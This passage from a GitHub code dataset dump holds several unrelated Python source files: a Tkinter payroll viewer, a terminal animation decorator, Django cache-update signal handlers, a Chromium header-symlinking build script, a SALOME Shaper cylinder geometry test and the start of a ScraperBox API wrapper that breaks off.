column=1)\n\t\tself.lNetpay.grid(row=5, column=0)\n\t\tself.txtNetpay.grid(row=5, column=1)\n\t\tself.btnNext.grid(row=6, column=0)\n\t\tself.btnClose.grid(row=6, column=1)\n\n\t\tself.update(\"next\")\n\n\tdef greet(self):\n\t\tprint(\"Greetings!\")\n\n\tdef update(self, method):\n\t\tif method == \"next\":\n\t\t\tprint(employees[self.cnt].name)\n\t\t\temp = employees[self.cnt]\n\t\t\tself.txtEmpNo.delete(0, END)\n\t\t\tself.txtEmpNo.insert(0, emp.empno)\n\t\t\tself.txtName.delete(0, END)\n\t\t\tself.txtName.insert(0, emp.name)\n\t\t\tself.txtAddr.delete(0, END)\n\t\t\tself.txtAddr.insert(0, emp.addr)\n\t\t\tself.txthw.delete(0, END)\n\t\t\tself.txthw.insert(0, emp.hwage)\n\t\t\tself.txthwkd.delete(0, END)\n\t\t\tself.txthwkd.insert(0, emp.hworked)\n\t\t\tself.txtNetpay.delete(0, END)\n\t\t\tself.txtNetpay.insert(0, emp.calc_salary())\n\t\t\tself.cnt += 1\n\t\t\tself.cnt = self.cnt % len(employees)\n\nif __name__ == \"__main__\":\n\tfile_ref = open(\"emp-payroll-data.txt\", 'r')\n\tline = file_ref.readline()\n\twhile line:\n\t\tline = line.strip('\\n')\n\t\temp_data = line.split(',')\n\t\tprint(emp_data)\n\t\temp = Employee(emp_data[0], emp_data[1], emp_data[2], emp_data[3], emp_data[4])\n\t\temployees.append(emp)\n\t\tline = file_ref.readline()\n\troot = Tk()\n\tmy_gui = MyFirstGUI(root)\n\troot.mainloop()\n","repo_name":"bharathpgp/chegg","sub_path":"python/emp-payroll.py","file_name":"emp-payroll.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"4282558865","text":"import threading\nimport time\n\nfrom functools import wraps\nfrom trashguy import TrashGuy\n\n\nclass Anim:\n def __init__(self, text: str = 'Loading', speed: int = 0.2):\n self.text: str = text\n self.speed: int = speed\n\n self.thread: threading.Thread = threading.Thread()\n self.trash_anim: TrashGuy = TrashGuy(self.text)\n self.frame_list: list = list(self.trash_anim)\n\n self.animate: bool = True\n\n def _start(self):\n for frame in self.frame_list:\n if self.animate:\n print(frame, end='', flush=True)\n time.sleep(self.speed)\n print(f'\\x1b[1K\\x1b[{len(frame) ** 2}D',\n end='')\n self.frame_list.pop(0)\n else:\n continue\n return\n\n def _get_last_frame(self):\n return self.frame_list[0] if len(self.frame_list) != 0 else []\n\n def start(self):\n self.thread = threading.Thread(target=self._start)\n self.thread.start()\n return\n\n def stop(self):\n self.animate = False\n return\n\ndef animate(text: str = 'LOADING', speed: int = 0.02):\n \"\"\"Decorator for adding trashguy animation to long running\n functions.\n Args:\n text (str): String reference to trash items\n speed (float): Number of seconds each cycle of animation.\n\n Examples:\n import trash_anim\n\n @trash.anim.animate(text='LOADING', speed=1)\n def test():\n import time\n time.sleep(10)\n print('\\nDone')\n \"\"\"\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n anim = Anim(text=text, speed=speed)\n anim.start()\n try:\n ret = func(*args, **kwargs)\n finally:\n anim.stop()\n return ret\n return wrapper\n return decorator\n\n\n\n\n","repo_name":"nitanmarcel/Trash-Anim","sub_path":"trash_anim/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42309429199","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, m2m_changed\n\nfrom bgsite.models 
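# Editor's note: skeleton of the animate decorator factory above. The outer
# call takes the options, @wraps preserves the wrapped function's metadata,
# and try/finally guarantees the animation is stopped even if the function
# raises.
from functools import wraps

def animate(text='LOADING'):
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            print(text, '...')          # stands in for Anim.start()
            try:
                return func(*args, **kwargs)
            finally:
                print(text, 'done')     # stands in for Anim.stop()
        return wrapper
    return decorator

@animate(text='DEMO')
def job():
    return 42

print(job())   # DEMO ... / DEMO done / 42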
import Person, Memorial, MemorialGraveplot, GravePlot\nfrom geometries.models import TopoPolygons, Layer, FeatureAttributes\nfrom geometriespublic.models import PublicAttribute\nfrom mapmanagement.views import getClusterLayer\n\n@receiver(m2m_changed, sender=Memorial.images.through)\ndef update_memorial_image(instance, action, **kwargs):\n \"\"\"Clears the cache when a post_add or post_remove signal is recieved from the model\"\"\"\n\n if action == 'post_add' or action == 'post_remove':\n \"\"\"Updates the layer cache when a memorial has been added or removed\"\"\"\n instance.update_layer_cache(False)\n\n@receiver([post_save, post_delete], sender=MemorialGraveplot)\ndef update_MemorialGraveplot(instance, **kwargs):\n\n \"\"\"Updates the layer cache when a link has been made or removed\"\"\"\n instance.memorial.update_layer_cache(False)\n\n@receiver([post_save], sender=TopoPolygons)\ndef update_TopoPolygon(instance, **kwargs):\n \"\"\"\n Updates the layer cache if this is a memorial or graveplot.\n Other feature types are updated in geometries app.\n \"\"\"\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n try:\n graveplot = instance.graveplot\n except:\n graveplot = False\n\n created = kwargs.get('created', False)\n\n if not created:\n # If created, this is dealt with in update_GravePlotOrMemorial.\n # Note: created does seem to work. Hence try except below.\n if memorial:\n try:\n obj = Memorial.objects.get(topopolygon__id=instance.id)\n obj.update_layer_cache(created)\n except:\n pass\n\n elif graveplot:\n try:\n obj = GravePlot.objects.get(topopolygon__id=instance.id)\n obj.update_layer_cache(created)\n except:\n pass\n \n if memorial or graveplot:\n query_set = Memorial.objects.filter(topopolygon__geometry__isnull=False).prefetch_related('topopolygon')\n \n # update the cluster layer if its based on memorials and a memorial has changed\n # or it's based on a graveplot and a graveplot has changed\n if (query_set.exists() and memorial) or ((not query_set.exists()) and graveplot):\n getClusterLayer()\n\n@receiver([post_delete], sender=TopoPolygons)\ndef delete_TopoPolygon(instance, **kwargs):\n \"\"\"\n Updates the layer cache if this is a memorial or graveplot.\n Other feature types are updated in geometries app.\n \"\"\"\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n try:\n graveplot = instance.graveplot\n except:\n graveplot = False\n\n if memorial:\n layer_obj = instance.layer\n layer_obj.update_feature_in_layer_geojson_cache(memorial.uuid, None, False, deleted=True)\n\n elif graveplot:\n # this graveplot has been deleted\n layer_obj = instance.layer\n\n # exception for available plot\n if layer_obj.feature_code.feature_type == 'available_plot':\n layer_obj.update_feature_in_layer_geojson_cache(instance.id, None, True, deleted=True)\n else:\n layer_obj.update_feature_in_layer_geojson_cache(graveplot.uuid, None, False, deleted=True)\n\n \n if memorial or graveplot:\n query_set = Memorial.objects.filter(topopolygon__geometry__isnull=False).prefetch_related('topopolygon')\n \n # update the cluster layer if its based on memorials and a memorial has changed\n # or it's based on a graveplot and a graveplot has changed\n if (query_set.exists() and memorial) or ((not query_set.exists()) and graveplot):\n getClusterLayer()\n\n@receiver([post_save], sender=Memorial)\n@receiver([post_save], sender=GravePlot)\ndef update_GravePlotOrMemorial(instance, created, **kwargs):\n \"\"\"\n If feature has just been created\n \"\"\"\n if created and 
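# Editor's note: framework-free sketch of the m2m_changed handling in
# signals.py above: act only on post_add / post_remove, and read the changed
# primary keys from pk_set. The sample pops a single pk; handlers that must
# cover bulk .add()/.remove() calls would iterate the whole set, as here.
def on_m2m_changed(instance, action, **kwargs):
    if action in ('post_add', 'post_remove'):
        for pk in kwargs.get('pk_set') or set():
            print('update cache of', instance, 'for attribute', pk)

on_m2m_changed('memorial-42', 'post_add', pk_set={7, 9})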
instance.topopolygon:\n if instance.topopolygon.layer.feature_code.feature_type == 'available_plot':\n # remove current cache if it exists\n instance.topopolygon.layer.update_feature_in_layer_geojson_cache(instance.topopolygon.id, None, False, deleted=True)\n\n instance.update_layer_cache(created)\n\n@receiver(m2m_changed, sender=TopoPolygons.feature_attributes.through)\ndef update_MaterialFeatureAttributes(instance, action, **kwargs):\n \"\"\"Clears the cache when a post_add or post_remove signal is recieved from the model\"\"\"\n\n if action == 'post_add' or action == 'post_remove':\n material_attribute = PublicAttribute.objects.get(name='Material')\n\n pk_set = kwargs.get('pk_set', False)\n pk = pk_set.pop()\n\n feature_attribute = FeatureAttributes.objects.get(pk=pk)\n \n # if it's the material attribute being modified\n if feature_attribute.attribute == material_attribute:\n\n try:\n memorial = instance.memorial\n except:\n memorial = False\n \n if memorial:\n memorial.update_layer_cache(False)\n\n@receiver([post_save], sender=FeatureAttributes)\ndef update_MaterialFeatureAttributes2(instance, **kwargs):\n\n created = kwargs.get('created', False)\n\n # if attribute has just been created, cache update will happen in update_MaterialFeatureAttributes\n if not created:\n material_attribute = PublicAttribute.objects.get(name='Material')\n \n # if it's the material attribute being modified\n if instance.attribute == material_attribute:\n\n try:\n memorial = instance.topopolygons_set.all()\n memorial = memorial[0].memorial\n except:\n memorial = False\n \n if memorial:\n memorial.update_layer_cache(False)","repo_name":"muhammadabdulhaseeb075/BGMS-Frontend","sub_path":"BGMS/bgsite/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25538500392","text":"#!/usr/bin/env python3\n\nfrom cache_vars import build_dir, vars, verbose\n\nfrom glob import glob\nimport os\nfrom os import listdir, readlink, set_blocking, symlink\nfrom os.path import basename, dirname, exists, getmtime, isdir, isfile, islink, join, pathsep, relpath, splitext\nfrom subprocess import DEVNULL, Popen, PIPE, run, TimeoutExpired\nfrom sys import executable, stderr\n\nimport json\n\ninc_link = join(build_dir,'component','inc_link')\nchromium_src = vars['CHROMIUM_SOURCE_TREE'].rstrip('/')\nprofile = vars['CHROMIUM_PROFILE']\nsource_bases = [\n chromium_src,\n join(chromium_src,'out',profile,'gen'),\n join(chromium_src,'v8','include'),\n join(chromium_src,'third_party', 'abseil-cpp')\n ]\nfor inc_dir in glob(f'{chromium_src}/third_party/**/include', recursive=True):\n if isdir(inc_dir):\n source_bases.append(inc_dir)\n\ndef makedirs(p):\n if not isdir(p):\n os.makedirs(p)\n\n# if not exists(join(inc_link,'google','protobuf')):\n# makedirs(join(inc_link,'google'))\n# symlink(join(chromium_src,'third_party','protobuf','src','google','protobuf'), join(inc_link,'google','protobuf'))\nif not exists(join(inc_link,'absl')):\n symlink(join(chromium_src,'third_party','abseil-cpp','absl'),join(inc_link,'absl'))\n\ndef quoted(inc):\n inc = inc[inc.index('\"')+1:]\n return inc[0:inc.index('\"')]\ndef angled(inc):\n inc = inc[inc.index('<')+1:]\n return inc[0:inc.index('>')]\n\nlink_count = 0\nunfound_count = 0\n\nclass Command:\n def __init__(self,c,d):\n self.command = c\n self.command[self.command.index('-c')] = '-E'\n i = self.command.index('-o')\n del self.command[i:i+2]\n verbose('Command is 
now',self.command)\n self.directory = d\n self.start()\n\n def __str__(self):\n return ' '.join(self.command)\n\n def start(self):\n self.retry = False\n self.dead = False\n self.task = Popen( self.command, cwd=self.directory, stdout=DEVNULL, stderr=PIPE, text=True )\n # self.task = Popen( self.command, cwd=self.directory, stdout=DEVNULL, stderr=PIPE, bufsize=1, text=True )\n self.left_over = ''\n set_blocking(self.task.stderr.fileno(), False)\n\n def finished(self) -> bool:\n if self.task.poll() is None:\n return False\n for line in self.task.stderr.readlines():\n self.eval_line(line)\n if self.retry:\n verbose('Retrying',self.command)\n self.start()\n return False\n return True\n\n def eval_line(self, line) -> bool:\n global link_count\n global unfound_count\n pound = line.find('#include')\n if pound == -1:\n return False\n verbose('Output line',line,self.command)\n line = line[pound:]\n quote = line.find('\"')\n angle = line.find('<')\n if angle == -1:\n inc = quoted(line)\n elif quote == -1:\n inc = angled(line)\n elif quote < angle:\n inc = quoted(line)\n else:\n inc = angled(line)\n target = join(inc_link,inc)\n if exists(target):\n print('Message',line,'mentioned',inc,'but it already exists as',target,file=stderr)\n return False\n if not exists( dirname(target) ):\n makedirs(dirname(target))\n for base in source_bases:\n source = join(base,inc)\n if exists(source):\n symlink(source, target)\n print(\"Symlink\",inc,source,'=>',target)\n self.retry = True\n link_count += 1\n return True\n print('Failed to resolve:',inc,pound,quote,angle,line,file=stderr)\n unfound_count += 1\n return False\n\npreempt = False\ndef search() -> bool:\n global link_count\n global unfound_count\n global preempt\n link_count = 0\n unfound_count = 0\n compile_commands = json.load(open(join(build_dir,'compile_commands.json')))\n commands = []\n for command_obj in compile_commands:\n artifact = command_obj['output']\n if not 'out_of_tree' in artifact:\n continue\n # evaluate_command(command_obj['command'].split(' '), command_obj['directory'])\n commands.append(Command(command_obj['command'].split(' '), command_obj['directory']))\n prev_len = 0\n existing = None\n existing_dir_map = None\n while len(commands):\n if len(commands) != prev_len:\n prev_len = len(commands)\n verbose('Remaining',list(map(str,commands)))\n try:\n doneso = next(filter(lambda x: x.finished(), commands))\n verbose('Finished, removing:',doneso)\n commands.remove(doneso)\n except StopIteration:\n if preempt:\n pass\n elif existing is None:\n existing = glob(inc_link+'/**/*.h',recursive=True)\n verbose('existing=',existing)\n elif existing_dir_map is None:\n existing_dir_map = set()\n for f in existing:\n if islink(f):\n t = readlink(f)\n existing_dir_map.add( (dirname(f), dirname(t)) )\n verbose('existing_dir_map=',existing_dir_map)\n elif len(existing_dir_map):\n t, f = existing_dir_map.pop()\n for entry in listdir(f):\n source = join(f,entry)\n target = join(t,entry)\n if exists(target):\n continue\n verbose('Consider source',source)\n if isfile(source) and splitext(entry)[-1] == '.h':\n symlink(source, target)\n print(\"Preemptively symlink\",entry,source,'=>',target)\n preempt = True\n break\n else:\n existing = None\n existing_dir_map = None\n print('Linked',link_count,'new headers.
Trouble with',unfound_count,'others.',file=stderr)\n return link_count > unfound_count\n\ndef flesh_out() -> bool:\n existing = glob(inc_link+'/**/*.h',recursive=True)\n existing_dir_map = set()\n for f in existing:\n if islink(f):\n t = readlink(f)\n existing_dir_map.add( (dirname(f), dirname(t)) )\n for t, f in existing_dir_map:\n for entry in listdir(f):\n source = join(f,entry)\n target = join(t,entry)\n if exists(target):\n continue\n if isfile(source) and splitext(entry)[-1] == '.h':\n symlink(source, target)\n print(\"Preemptively symlink\",entry,source,'=>',target)\n return True\n return False\n\n\nif search():\n search()\nelif not preempt:\n flesh_out()\n","repo_name":"little-bear-labs/ipfs-chromium","sub_path":"cmake/inc_link.py","file_name":"inc_link.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"40218855286","text":"from GeomAPI import *\nfrom SketchAPI import *\n\nfrom salome.shaper import model\n\nimport math\n\nTOLERANCE = 1.e-7\n\ndef assertCylinder(theCylinder, theLocation, theAxis, theRadius, theHeight):\n assert(theCylinder is not None)\n assert(theCylinder.isInfinite() == False)\n aLoc = theCylinder.location()\n aDir = theCylinder.axis()\n assert(aLoc.distance(theLocation) < TOLERANCE), \"({}, {}, {}) != expected ({}, {}, {})\".format(aLoc.x(), aLoc.y(), aLoc.z(), theLocation.x(), theLocation.y(), theLocation.z())\n assert(aDir.isParallel(theAxis, TOLERANCE)), \"dir({}, {}, {}) is not parallel to dir({}, {}, {})\".format(aDir.x(), aDir.y(), aDir.z(), theAxis.x(), theAxis.y(), theAxis.z())\n assert(math.fabs(theCylinder.radius() - theRadius) < TOLERANCE), \"Radius {} != {}\".format(theCylinder.radius(), theRadius)\n assert(math.fabs(theCylinder.height() - theHeight) < TOLERANCE), \"Height {} != {}\".format(theCylinder.height(), theHeight)\n\ndef checkCylinderFace(theDocument, theFaceName, theLocation, theAxis, theRadius, theHeight):\n aFace = model.addFace(theDocument, [model.selection(\"FACE\", theFaceName)])\n aShape = aFace.result().resultSubShapePair()[0].shape()\n assert(aShape.isFace())\n assertCylinder(aShape.face().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aFace.feature())\n\ndef checkCylinderShell(theDocument, theFaceNames, theLocation, theAxis, theRadius, theHeight):\n aSelection = []\n for name in theFaceNames:\n aSelection.append(model.selection(\"FACE\", name))\n aShell = model.addShell(theDocument, aSelection)\n aShape = aShell.result().resultSubShapePair()[0].shape()\n assert(aShape.isShell())\n assertCylinder(aShape.shell().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aShell.feature())\n\ndef checkCylinderSolid(theDocument, theFaceNames, theLocation, theAxis, theRadius, theHeight):\n aSelection = []\n for name in theFaceNames:\n aSelection.append(model.selection(\"FACE\", name))\n aSolid = model.addSolid(theDocument, aSelection)\n aShape = aSolid.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assertCylinder(aShape.solid().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n theDocument.removeFeature(aSolid.feature())\n\ndef checkCylinderAll(theDocument, theFeature, theFaceName, theLocation, theAxis, theRadius, theHeight):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assertCylinder(aShape.solid().getCylinder(), theLocation, theAxis, theRadius, theHeight)\n\n
checkCylinderShell(theDocument, [theFaceName], theLocation, theAxis, theRadius, theHeight)\n checkCylinderFace(theDocument, theFaceName, theLocation, theAxis, theRadius, theHeight)\n\ndef checkNonCylinder(theFeature):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isSolid())\n assert(aShape.solid().getCylinder() is None)\n\ndef checkNonCylindricalShell(theFeature):\n aShape = theFeature.result().resultSubShapePair()[0].shape()\n assert(aShape.isShell())\n assert(aShape.shell().getCylinder() is None)\n\n\nmodel.begin()\npartSet = model.moduleDocument()\nPart_1 = model.addPart(partSet)\nPart_1_doc = Part_1.document()\nParamH = model.addParameter(Part_1_doc, \"H\", \"10\")\nParamR = model.addParameter(Part_1_doc, \"R\", \"10\")\nParamAngle = model.addParameter(Part_1_doc, \"Angle\", \"30\")\nCylinder_1 = model.addCylinder(Part_1_doc, model.selection(\"VERTEX\", \"PartSet/Origin\"), model.selection(\"EDGE\", \"PartSet/OZ\"), \"2*R\", \"H\")\nSketch_1 = model.addSketch(Part_1_doc, model.selection(\"FACE\", \"Cylinder_1_1/Face_2\"))\nSketchProjection_1 = Sketch_1.addProjection(model.selection(\"VERTEX\", \"[Cylinder_1_1/Face_1][Cylinder_1_1/Face_2]__cc\"), False)\nSketchPoint_1 = SketchProjection_1.createdFeature()\nSketchCircle_1 = Sketch_1.addCircle(0, 0, 10)\nSketchConstraintCoincidence_1 = Sketch_1.setCoincident(SketchPoint_1.result(), SketchCircle_1.center())\nSketchConstraintRadius_1 = Sketch_1.setRadius(SketchCircle_1.results()[1], \"R\")\nmodel.do()\nExtrusion_1 = model.addExtrusion(Part_1_doc, [model.selection(\"FACE\", \"Sketch_1/Face-SketchCircle_1_2f\")], model.selection(), \"H\", 0)\nSketch_2 = model.addSketch(Part_1_doc, model.standardPlane(\"XOZ\"))\nSketchLine_1 = Sketch_2.addLine(5, 20, 0, 20)\nSketchLine_2 = Sketch_2.addLine(0, 20, 0, 30)\nSketchLine_3 = Sketch_2.addLine(0, 30, 5, 30)\nSketchLine_4 = Sketch_2.addLine(5, 30, 5, 20)\nSketchConstraintCoincidence_2 = Sketch_2.setCoincident(SketchLine_4.endPoint(), SketchLine_1.startPoint())\nSketchConstraintCoincidence_3 = Sketch_2.setCoincident(SketchLine_1.endPoint(), SketchLine_2.startPoint())\nSketchConstraintCoincidence_4 = Sketch_2.setCoincident(SketchLine_2.endPoint(), SketchLine_3.startPoint())\nSketchConstraintCoincidence_5 = Sketch_2.setCoincident(SketchLine_3.endPoint(), SketchLine_4.startPoint())\nSketchConstraintHorizontal_1 = Sketch_2.setHorizontal(SketchLine_1.result())\nSketchConstraintVertical_1 = Sketch_2.setVertical(SketchLine_2.result())\nSketchConstraintHorizontal_2 = Sketch_2.setHorizontal(SketchLine_3.result())\nSketchConstraintVertical_2 = Sketch_2.setVertical(SketchLine_4.result())\nSketchConstraintLength_1 = Sketch_2.setLength(SketchLine_1.result(), \"R/2\")\nSketchConstraintLength_2 = Sketch_2.setLength(SketchLine_2.result(), \"H\")\nSketchIntersectionPoint_1 = Sketch_2.addIntersectionPoint(model.selection(\"EDGE\", \"[Extrusion_1_1/Generated_Face&Sketch_1/SketchCircle_1_2][Extrusion_1_1/To_Face]\"), False)\n[SketchPoint_2, SketchPoint_3] = SketchIntersectionPoint_1.intersectionPoints()\nSketchConstraintCoincidence_6 = Sketch_2.setCoincident(SketchAPI_Point(SketchPoint_2).coordinates(), SketchLine_1.result())\nSketchProjection_2 = Sketch_2.addProjection(model.selection(\"EDGE\", \"PartSet/OZ\"), False)\nSketchLine_5 = SketchProjection_2.createdFeature()\nSketchConstraintCoincidence_7 = Sketch_2.setCoincident(SketchLine_2.endPoint(), SketchLine_5.result())\nmodel.do()\nRevolution_1 = model.addRevolution(Part_1_doc, [model.selection(\"FACE\",
\"Sketch_2/Face-SketchLine_4r-SketchLine_3r-SketchLine_2r-SketchLine_1r\")], model.selection(\"EDGE\", \"PartSet/OZ\"), 270, 0)\nmodel.do()\n\n# Test 1. Check cylinders\naLoc1 = GeomAPI.GeomAPI_Pnt(0, 0, 0)\naLoc2 = GeomAPI.GeomAPI_Pnt(0, 0, 2 * ParamH.value())\naLoc3 = GeomAPI.GeomAPI_Pnt(0, 0, 3 * ParamH.value())\nanAxis = GeomAPI.GeomAPI_Dir(0, 0, 1)\ncheckCylinderAll(Part_1_doc, Cylinder_1, \"Cylinder_1_1/Face_1\", aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\ncheckCylinderAll(Part_1_doc, Extrusion_1, \"Extrusion_1_1/Generated_Face&Sketch_1/SketchCircle_1_2\", aLoc2, anAxis, ParamR.value(), ParamH.value())\ncheckNonCylinder(Revolution_1)\ncheckCylinderShell(Part_1_doc, [\"Revolution_1_1/Generated_Face&Sketch_2/SketchLine_4\"], aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\ncheckCylinderFace(Part_1_doc, \"Revolution_1_1/Generated_Face&Sketch_2/SketchLine_4\", aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 2. Rotate cylinders\nRotation_1 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Cylinder_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\nRotation_2 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Extrusion_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\nRotation_3 = model.addRotation(Part_1_doc, [model.selection(\"SOLID\", \"Revolution_1_1\")], model.selection(\"EDGE\", \"PartSet/OX\"), \"Angle\")\n\nanAngle = ParamAngle.value() * math.pi / 180.0\naCosAngle = math.cos(anAngle)\naSinAngle = math.sin(anAngle)\nanAxis = GeomAPI.GeomAPI_Dir(0, anAxis.y() * aCosAngle - anAxis.z() * aSinAngle, anAxis.y() * aSinAngle + anAxis.z() * aCosAngle)\naLoc1 = GeomAPI.GeomAPI_Pnt(0, aLoc1.y() * aCosAngle - aLoc1.z() * aSinAngle, aLoc1.y() * aSinAngle + aLoc1.z() * aCosAngle)\naLoc2 = GeomAPI.GeomAPI_Pnt(0, aLoc2.y() * aCosAngle - aLoc2.z() * aSinAngle, aLoc2.y() * aSinAngle + aLoc2.z() * aCosAngle)\naLoc3 = GeomAPI.GeomAPI_Pnt(0, aLoc3.y() * aCosAngle - aLoc3.z() * aSinAngle, aLoc3.y() * aSinAngle + aLoc3.z() * aCosAngle)\ncheckCylinderAll(Part_1_doc, Rotation_1, \"Rotation_1_1/MF:Rotated&Cylinder_1_1/Face_1\", aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\ncheckCylinderAll(Part_1_doc, Rotation_2, \"Rotation_2_1/MF:Rotated&Sketch_1/SketchCircle_1_2\", aLoc2, anAxis, ParamR.value(), ParamH.value())\ncheckNonCylinder(Rotation_3)\ncheckCylinderShell(Part_1_doc, [\"Rotation_3_1/MF:Rotated&Sketch_2/SketchLine_4\"], aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\ncheckCylinderFace(Part_1_doc, \"Rotation_3_1/MF:Rotated&Sketch_2/SketchLine_4\", aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 3. Split cylinder and compose a shell\nPlane_4 = model.addPlane(Part_1_doc, model.selection(\"FACE\", \"PartSet/XOY\"), \"2.2*H\", False)\nPlane_5 = model.addPlane(Part_1_doc, model.selection(\"FACE\", \"PartSet/XOZ\"), \"H\", False)\nPartition_1_objects = [model.selection(\"SOLID\", \"Rotation_3_1\"), model.selection(\"FACE\", \"Plane_1\"), model.selection(\"FACE\", \"Plane_2\")]\nPartition_1 = model.addPartition(Part_1_doc, Partition_1_objects)\n\nShell_1_objects = [\"Partition_1_1_1/Modified_Face&Sketch_2/SketchLine_4\",\n \"Partition_1_1_4/Modified_Face&Sketch_2/SketchLine_4\",\n \"(Partition_1_1_2/Modified_Face&Revolution_1_1/To_Face)(Partition_1_1_2/Modified_Face&Sketch_2/SketchLine_1)\"]\ncheckCylinderShell(Part_1_doc, Shell_1_objects, aLoc3, anAxis, 0.5 * ParamR.value(), ParamH.value())\n\n# Test 4.
Split cylinder and compose a solid\nPartition_2 = model.addPartition(Part_1_doc, [model.selection(\"SOLID\", \"Rotation_1_1\"), model.selection(\"FACE\", \"PartSet/XOZ\")])\nSolid_1_objects = [\"(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3)(Partition_2_1_1/Modified_Face&PartSet/XOZ/XOZ)(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2)\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_1&weak_name_2\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2\",\n \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_1\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_2\",\n \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_3\"]\ncheckCylinderSolid(Part_1_doc, Solid_1_objects, aLoc1, anAxis, 2 * ParamR.value(), ParamH.value())\n\n# Test 5. Check non-cylinder\nSketch_3 = model.addSketch(Part_1_doc, model.defaultPlane(\"XOY\"))\nSketchCircle_2 = Sketch_3.addCircle(12.62721775445329, 9.188425784259302, 5)\nSketchCircle_3 = Sketch_3.addCircle(16.49821418064359, 12.35313535520289, 5)\nSketchConstraintRadius_2 = Sketch_3.setRadius(SketchCircle_2.results()[1], 5)\nSketchConstraintEqual_1 = Sketch_3.setEqual(SketchCircle_2.results()[1], SketchCircle_3.results()[1])\nSketchConstraintDistance_1 = Sketch_3.setDistance(SketchCircle_2.center(), SketchCircle_3.center(), 5, True)\nmodel.do()\nExtrusion_2 = model.addExtrusion(Part_1_doc, [model.selection(\"COMPOUND\", \"Sketch_3\")], model.selection(), 10, 0)\nSolid_1_objects = [model.selection(\"FACE\", \"Extrusion_2_1_1/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_1/To_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_2/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_2\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_1\"), model.selection(\"FACE\", \"Extrusion_2_1_2/To_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_3/From_Face\"), model.selection(\"FACE\", \"Extrusion_2_1_3/Generated_Face&Sketch_3/SketchCircle_2_2\"), model.selection(\"FACE\", \"Extrusion_2_1_3/To_Face\")]\nSolid_1 = model.addSolid(Part_1_doc, Solid_1_objects)\ncheckNonCylinder(Solid_1)\n\n# Test 6.
Check non-cylindrical shell\nShell_1_objects = [model.selection(\"FACE\", \"(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3)(Partition_2_1_1/Modified_Face&PartSet/XOZ/XOZ)(Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2)\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_1&weak_name_2\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_2\"),\n model.selection(\"FACE\", \"Partition_2_1_1/Modified_Face&Cylinder_1_1/Face_3\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_1\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_2\"),\n model.selection(\"FACE\", \"Partition_2_1_2/Modified_Face&Cylinder_1_1/Face_3\")]\nShell_1 = model.addShell(Part_1_doc, Shell_1_objects)\ncheckNonCylindricalShell(Shell_1)\n\nShell_2 = model.addShell(Part_1_doc, [model.selection(\"FACE\", \"Extrusion_2_1_3/Generated_Face&Sketch_3/SketchCircle_2_2\"), model.selection(\"FACE\", \"Extrusion_2_1_2/Generated_Face&Sketch_3/SketchCircle_3_2&weak_name_1\")])\ncheckNonCylindricalShell(Shell_2)\n\nmodel.end()\n","repo_name":"x3-apptech/salome-modules-shaper","sub_path":"src/GeomAPI/Test/TestCylinder.py","file_name":"TestCylinder.py","file_ext":"py","file_size_in_byte":12840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38462559732","text":"from typing import Optional\n\nimport requests\n\nfrom proxyscraperservicewrapper.services.abstractservice import AbstractService\n\n\nclass ScraperBoxService(AbstractService):\n __api_base_url = \"https://api.scraperbox.com/scrape\"\n __query_template = \"{}?token={}&url={}&javascript_enabled={}\"\n __credit_usage_template = 